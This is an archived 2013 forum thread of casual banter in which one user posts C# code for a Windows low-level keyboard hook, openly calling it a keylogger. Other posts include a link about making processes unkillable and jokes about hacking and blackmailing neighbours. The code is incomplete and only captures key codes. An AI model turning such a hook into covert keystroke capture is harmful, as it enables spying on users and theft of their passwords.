yea its a keylogger [Archive]

PDA

View Full Version : yea its a keylogger

r00t

06-13-2013, 03:19 PM

http://msdn.microsoft.com/en-us/library/windows/desktop/ms644985(v=vs.85).aspx

use linux

r00t

06-13-2013, 03:21 PM

http://i.imgur.com/Ikb4OZE.png

r00t

06-13-2013, 03:26 PM

using System;
using System.Collections.Generic;
using System.Text;

namespace KHook
{
public class KeyboardHook : IDisposable
{
#region Events
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
public delegate void HookEventHandler(object sender, KeyboardHookEventArgs e);
public event HookEventHandler KeyDown;
public event HookEventHandler KeyUp;
#endregion

#region Constants
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private const int WM_SYSKEYDOWN = 0x0104;
private LowLevelKeyboardProc _proc = null;
private static IntPtr _hookID = IntPtr.Zero;
#endregion

#region Imports
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
IntPtr wParam, IntPtr lParam);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);

#endregion

#region Constructor
public KeyboardHook()
{
_proc = new LowLevelKeyboardProc(HookCallback);
_hookID = SetHook(_proc);
}

#endregion

#region Methods
private IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
GetModuleHandle(curModule.ModuleName), 0);
}
}

private IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
//if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
if (nCode >= 0 && (wParam == (IntPtr)WM_KEYDOWN || wParam == (IntPtr)WM_SYSKEYDOWN))
{
int vkCode = Marshal.ReadInt32(lParam);
WinForms.Keys key = (WinForms.Keys)vkCode;
if (this.KeyDown != null)
this.KeyDown(this, new KeyboardHookEventArgs(vkCode));
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}

#endregion

#region Destructor
public void Dispose()
{
UnhookWindowsHookEx(_hookID);
}
#endregion
}
}

Hasbinbad

06-13-2013, 04:10 PM

i like how you've left the steak tab open.. i really do recommend doing it.

r00t

06-13-2013, 04:11 PM

maybe for 2 hours

Hasbinbad

06-13-2013, 04:14 PM

so i forgot if i clicked on salty's virus link or not, how do I find the keylogger and kill it if i have it?

r00t

06-13-2013, 04:16 PM

I made this helpful tutorial to remove it

http://www.youtube.com/watch?v=k9u67u82a74

r00t

06-13-2013, 04:23 PM

HOW TO SPAWN CHILDREN THAT CANNOT BE KILLED

http://stackoverflow.com/questions/17096294/spawn-nonchild-process-that-cannot-be-killed-by-process-tree

Lubian

06-13-2013, 04:36 PM

Oh amazing you learned how to do a PInvoke and copy and paste code.</sarcasm>

Really, you need to stop posting and embarrassing yourself.

Well at least you win the award for getting the most downvotes I've seen for a SO question in 15 minutes.

Ishukone

06-13-2013, 04:38 PM

shut the fuck up nerd

r00t

06-13-2013, 04:38 PM

haha yea I was just commenting on irc.rizon.net #p99 about how many downvotes and it still isnt closed yet

Nirgon

06-13-2013, 04:38 PM

lawled

r00t

06-13-2013, 04:42 PM

I think it was a related Tom Petty that I clicked while drunk

not a bad song tho

r00t

06-13-2013, 04:44 PM

http://puu.sh/3f1Hm.png

Ishukone

06-13-2013, 04:45 PM

naez stop hackan me

Hasbinbad

06-13-2013, 04:51 PM

Who the fuck is this idiot biting on DJ Yella style?

Ishukone

06-13-2013, 04:55 PM

http://puu.sh/3f2eK

Hasbinbad

06-13-2013, 04:56 PM

the only yella was on stage with E

<object width="420" height="315"><param name="movie" value="http://www.youtube.com/v/EcBquc8qZRo?hl=en_US&version=3&rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/EcBquc8qZRo?hl=en_US&version=3&rel=0" type="application/x-shockwave-flash" width="420" height="315" allowscriptaccess="always" allowfullscreen="true"></embed></object>

Hasbinbad

06-13-2013, 04:56 PM

wtf
https://www.youtube.com/watch?v=EcBquc8qZRo

r00t

06-13-2013, 04:57 PM

rogean disabled html after salty did the ********************** hack

r00t

06-13-2013, 04:58 PM

^hahahah I like that it gets censored

r00t

06-13-2013, 05:27 PM

gnome detected

r00t

06-13-2013, 05:29 PM

wireshark detected

r00t

06-13-2013, 05:30 PM

sniffin jeremys packets of death

r00t

06-13-2013, 05:33 PM

the ol aircrack n wireshark is how i blackmail my neighbors

Hasbinbad

06-13-2013, 05:49 PM

i got ur IP rellapse 192.168.1.254 now i will hack u

r00t

06-13-2013, 05:50 PM

ddosin 127.0.0.1

Hasbinbad

06-13-2013, 05:50 PM

FIRING LAZERZ @ 192.168.1.254

Hasbinbad

06-13-2013, 05:51 PM

just wait till i put this out on twitter

r00t

06-13-2013, 05:53 PM

ima chargin my assburgers

r00t

06-13-2013, 07:33 PM

all ur bank r belong 2 me